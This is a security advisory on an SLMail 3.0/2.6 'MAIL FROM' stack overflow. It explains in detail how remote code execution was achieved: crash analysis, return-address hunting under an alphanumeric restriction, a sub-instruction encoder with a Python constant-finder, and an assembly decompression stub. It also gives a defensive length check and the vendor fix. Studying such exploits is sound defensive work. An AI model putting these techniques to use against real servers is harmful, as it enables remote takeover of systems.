COMMAND
Seattle Lab Sendmail
SYSTEMS AFFECTED
Win NT with SLMail 3.0.2421 and 2.6 (Win95)
PROBLEM
Jeremy Kothe found the following. If the "mail from" field exceeds
256 bytes, it will pass through the receive process without being
trimmed... When the mail dispatcher picks up the mail file to
process, it copies the field into a stack buffer of only 256 bytes,
overwriting the function return address and normally halting the
SLMail server. The DoS attack is simple: send an e-mail with a
"mail from" field longer than 256 bytes.
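The step that is missing at receive time is a length check. As a
minimal sketch only (this is not SLMail's code; the function name,
the reply texts and the choice to reject rather than trim are all
assumptions made for illustration), a receiver could refuse an
over-long argument before it is ever written to the mail file:

```python
# Hypothetical receive-side check; the 256 figure is the size of the
# dispatcher's stack buffer as described in the text.
MAX_MAIL_FROM = 256


def check_mail_from(line: bytes):
    """Return an (SMTP reply code, text) pair for a MAIL FROM command line."""
    verb, sep, arg = line.rstrip(b"\r\n").partition(b":")
    if not sep or verb.strip().upper() != b"MAIL FROM":
        return 500, "command not recognised"
    # ">=" leaves room for a terminating NUL, assuming the buffer
    # holds a C-style string.
    if len(arg.strip()) >= MAX_MAIL_FROM:
        # Reject instead of trimming, so nothing over-long reaches disk.
        return 501, "path too long"
    return 250, "OK"
```

With this in place the 1600-byte test address used later in the
text would be answered with a 501 and never reach the dispatcher.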
To exploit the attack to remotely execute code is difficult but
NOT impossible. The main difficulty is that the string which
overflows the stack (the "mail from" name) can contain only valid
email address characters. But don't think that makes it
impossible...
Stack overflows under UNIX are usually a simple affair - create a
shell and pipe it to the attacker. Under Windows 95 or Windows
NT, however, the task is a little more complex. If you are not
familiar with basic win32 stack overflow methods, see dildog's
excellent article at:
http://www.cultdeadcow
as well as his contributions at:
http://www.l0pht.com.
What about tools? Microsoft's under-rated (though limited) WinDbg
to debug and examine the fault. Borland's Turbo Assembler and
DataRescue's IDA (disassembler) for converting code into data
bytes (no, sorry, I refuse to remember that 0x50 is push eax... oh
shit). Borland Delphi, Jeremy's 3GL of choice for the Windows
environment, to create and send the e-mail. Any IP-capable platform
could of course be used here.
The idea behind ANY overflow execution exploit is to leverage a
bug or crash to execute data. To do anything, we must first "snag
the EIP". To do this, we must examine the environment produced
by the initial crash, find somewhere a pointer to our data, and
then somehow get it into the eip register... So let's take a look
at the environment created when SLMail overflows.
Fire up SLMail.exe (it's a service, so use "net start slmail" or
the control panel), then start WinDbg and Attach (F6) to the
SLMail process. Press F5 to continue execution... Now we create a
test program to send a buffer of 1600-odd 0x61 ("a")'s as the
email from address. Running this program, our e-mail is accepted
and placed, as a file, into SLMail's "In" subdirectory. SLMail.exe
then picks up this file and bang... WinDbg reports our
first-chance-exception at 0x42264f.
0042263C mov ecx, [esp+114h+arg_0]
00422643 mov edx, [esp+114h+arg_4]
0042264A mov eax, [esp+114h+var_104]
0042264E pop edi
0042264F ==> exception mov [ecx], esi
00422651 mov [edx], eax
00422653 mov eax, ebp
00422655 pop esi
00422656 pop ebp
00422657 pop ebx
00422658 add esp, 104h
0042265E retn
The memory address which is being written to here happens to be
0x61616161, which we see four lines above as being the procedure's
first argument on the stack... Looking at the registers, we find
that the stack area has been well and truly overwritten by our
test data, and that several registers (esp, esi, edi) are
pointing to areas within this data area. And if we can stop the
exception at 0x42264f, and the next one at 0x422651, then the retn
will return to 0x61616161, or whatever else we choose to feed it.
To stop the crash, we need to find an address which is writable,
and place two copies of it into our buffer in the appropriate
place. This would be no real problem except for our main
limitation: the alphanumeric-only content of our buffer allows us
only 1/1024 of the address space. So we search and search...
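To get a feel for how restrictive this is, the arithmetic can be
sketched as below. The 62-character set (letters and digits) is an
assumption; the text does not list the exact bytes SLMail accepts,
and the 1/1024 figure is the author's own estimate.

```python
import string

# Assumed usable byte values: ASCII letters and digits only.
usable = string.ascii_letters + string.digits

# An address is four bytes, and every one of them must be usable.
fraction = (len(usable) / 256) ** 4
one_in = 1 / fraction

# Number of usable values per byte that would give exactly 1/1024.
per_byte_for_1024 = 256 / 1024 ** 0.25

print(f"{len(usable)} usable values per byte: about 1 address in {one_in:.0f}")
print(f"1/1024 corresponds to about {per_byte_for_1024:.0f} usable values per byte")
```

Under the 62-character assumption roughly one address in 291 is
usable; the 1/1024 figure would correspond to a stricter set of
about 45 values per byte. Either way, very little of any given
module is reachable.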
Nothing in the main program, so one-by-one we check the dlls used.
Now, this is where the issue of platform-dependency comes along.
If we use an address in a dll, we are binding the exploit to that
version of the dll. Any other versions would crash. Luckily, the
proliferation of NT 4.0 sp3 platforms provides a number of large
dlls which are fairly constant (e.g. user32.dll, kernel32.dll).
It's worth remembering that NT server and workstation binaries are
identical, so even by targeting only this one platform, an
attacker could probably achieve a > 70% success rate on a random
basis.
So eventually an address in a dll data segment was found which
was valid for us to use, and it was plugged in. Now we're past the
crash. Next comes returning to the stack via Microsoftware.
Normally, at this point, you could open up the main executable in
IDA, turn on showing of op-codes, then do a string search for
" 54 " (the op-code for push esp). Ideally, what you're looking
for is:
push esp
retn
Of course compiled code would not usually do this, but by
searching for "54" you can almost always find something like:
add esp, 54h
retn
Which is really the same thing! Enter at the 54h operand byte
instead of at the start of the instruction, so the "add esp" is
ignored, and voila.
Again, this is made enormously difficult because of the 1/1024
limitation. And in this case, dig as he might, Jeremy couldn't
find anything at a valid address... The closest things he could
use were a few bits like this:
push esp (actually an add esp, 54h)
pop eax/ebx
pop edi
...
retn
Now all this does is get esp into eax. Doesn't seem like much
until you realise that it's relatively common to do a "call eax"
or "call ebx". So, we go and find ourselves a "call eax/ebx"
statement again with a valid (alphanumeric) address. We find a
"call ebx" which we can use, so we go back and find a variant of
the above code snippet which moves our esp into ebx. Positioning
these two addresses at the correct position in the buffer can be
tricky, but eventually we end up returning to what was originally
our stack. The first stage of the attack is over, and were it not
for the alphanumeric limitations, the battle would be over.
Now, executing text. We have control of the eip... cheer, rest,
think. What can we put in our buffer to execute? Not bloody much.
Every byte in our buffer MUST be valid alphanumeric.
Now, we wouldn't have come this far without a plan, though. Our
idea is to use what small instruction set we DO have to
dynamically CREATE a more flexible piece of code. Checking the
instructions available to us in the character set we have, we find
that we have all of the "push"es and most of the "pop"s, along
with, luckily, the "-" character, which turns into a "sub eax,..."
So, the initial code would PUSH the program onto the stack, then
execute it from there. The first trick is to push bytes which
cannot be in our buffer. Jeremy came up with the following:
push xxxxxxxxh
pop eax
sub eax, xxxxxxxxh
...
sub eax, xxxxxxxxh
push eax
Effectively, this means that for each DWORD of the target program,
we need to calculate a series of valid DWORDs which, subtracted
one after another, produce the target DWORD. Sounds tough, but it
turns out that a bit of brute force solves this one easily. Jeremy
wrote a fairly simple program which calculated these numbers
and produced code for us to cut and paste.
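The arithmetic behind that search can be sketched as follows. This
is not Jeremy's program, which is not reproduced here; the function
names, the letters-and-digits byte set and the limit of four terms
are assumptions for illustration. The sketch only finds the
numbers: given a starting value and a target, it works one byte
column at a time, low byte first, carrying into the next column.

```python
import string
from itertools import product

# Assumed usable byte values: ASCII letters and digits only.
ALLOWED = sorted(string.ascii_letters.encode() + string.digits.encode())
ALLOWED_SET = frozenset(ALLOWED)
MASK = 0xFFFFFFFF


def is_allowed_dword(value):
    """True if all four bytes of value are in the allowed set."""
    return all(b in ALLOWED_SET for b in value.to_bytes(4, "little"))


def _solve_column(want, carry, k):
    """Find k allowed bytes whose sum plus carry ends in the byte `want`."""
    for head in product(ALLOWED, repeat=k - 1):
        last = (want - carry - sum(head)) % 256
        if last in ALLOWED_SET:
            return head + (last,)
    return None


def find_subtrahends(start, target, max_terms=4):
    """Return allowed DWORDs a1..ak with start - a1 - ... - ak == target (mod 2**32)."""
    diff_bytes = ((start - target) & MASK).to_bytes(4, "little")
    for k in range(1, max_terms + 1):
        columns, carry = [], 0
        for want in diff_bytes:
            choice = _solve_column(want, carry, k)
            if choice is None:
                break  # this k cannot work from here, try one more term
            columns.append(choice)
            carry = (sum(choice) + carry) >> 8
        else:
            # Reassemble term j from the j-th byte of every column.
            return [int.from_bytes(bytes(col[j] for col in columns), "little")
                    for j in range(k)]
    return None
```

For example, find_subtrahends(0x61616161, 0xDEADBEEF) returns a
short list of alphanumeric DWORDs that take the first value to the
second by repeated subtraction. The search is greedy per column, so
it may use more terms than strictly necessary.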
After we've pushed this program onto the stack however, we need
then to jump or call to it. Unfortunately our limited instruction
set has only short jumps, which limits our range so much we'd
have to chain them. The initial location of the stack pointer, and
therefore the pushed program, is just above our current location
(where we are pushing the program). So, instead of chaining
short upwards jumps which would be hell to position and maintain,
Jeremy inserted a series of "popad" instructions to move the stack
pointer down, over and past the push code, allowing only enough
room for the target program. The program is then pushed onto the
stack and voila, no jump or call needed. We have created the
program in front of our eip and we naturally execute into it.
Tricky, but by leaving a bit of room at the end of the "push"ing
routine filled with harmless "inc esi" instructions, it works
fine. So, by using about 6-16 bytes per DWORD, we can create and
run a program. At this rate, we would rapidly run out of room in
our buffer to do anything. So, we add another trick. The program
we produce is a small decompression routine. We use a simple
nibble-to-byte encoding to store our main program elsewhere in the
buffer. This gives a 2 DWORD to 1 DWORD ratio of encoded text to
program, and allows a larger main program.
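The encoding itself is plain data shuffling and can be modelled in
a few lines. This is a sketch under assumptions: the function names
are hypothetical, and the nibble order (low nibble first, each
nibble stored as 'a' plus its value) is read off the 6161h
constants and shifts in the decompression routine rather than
stated by the author. The order in which decoded words end up on
the stack is not modelled.

```python
BASE = ord("a")  # 0x61, the constant the routine subtracts from each byte


def nibble_encode(data: bytes) -> bytes:
    """Encode each byte as two characters in 'a'..'p', low nibble first."""
    out = bytearray()
    for byte in data:
        out.append(BASE + (byte & 0x0F))  # low nibble
        out.append(BASE + (byte >> 4))    # high nibble
    return bytes(out)


def nibble_decode(text: bytes) -> bytes:
    """Inverse of nibble_encode."""
    if len(text) % 2:
        raise ValueError("encoded text must have an even length")
    out = bytearray()
    for i in range(0, len(text), 2):
        lo = text[i] - BASE
        hi = text[i + 1] - BASE
        if not (0 <= lo < 16 and 0 <= hi < 16):
            raise ValueError("character outside 'a'..'p'")
        out.append((hi << 4) | lo)
    return bytes(out)
```

Every output character falls in 'a'..'p', so the encoded text
passes the alphanumeric restriction at the cost of doubling in
size.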
The decompression routine is simple enough:
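; point esi at the source area, a fixed offset above esp
mov esi, esp
add esi, 122 ; source from esp...
; get length of code...
xor ecx, ecx
mov cx, word ptr [esi]
add esi, 2
sub cx, 6161h ; two characters -> two nibbles
mov bx, cx
shr cx, 4
or cl, bl ; cx = number of words to decode
; decode code...
decode:
mov eax, [esi] ; fetch four encoded characters
add esi, 4
sub eax, 61616161h ; each byte is now a nibble, 0..15
mov ebx, eax
shr eax, 4
or al, bl ; al = nibbles 1 and 0 packed
mov ebx, eax
shr eax, 4
mov al, bl ; restore the packed low byte
ror eax, 0ch ; nibble 3 lands in the high half of al
shr al, 4
rol eax, 0ch ; ax = nibbles 3..0 packed
push ax ; emit one decoded word
loop decode
call esp ; run the decoded program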
Game over. We can run ANY code we want at this point.
SOLUTION
The fix was incorporated in beta versions of SLmail 3.1 and
SLmail 2.7. Customers who would like to receive the beta versions
should contact betaadmin@seattlelab.com. Please put the product
serial number in the subject line. Seattle Lab will post the
release versions of these programs to our download site as soon
as testing is completed.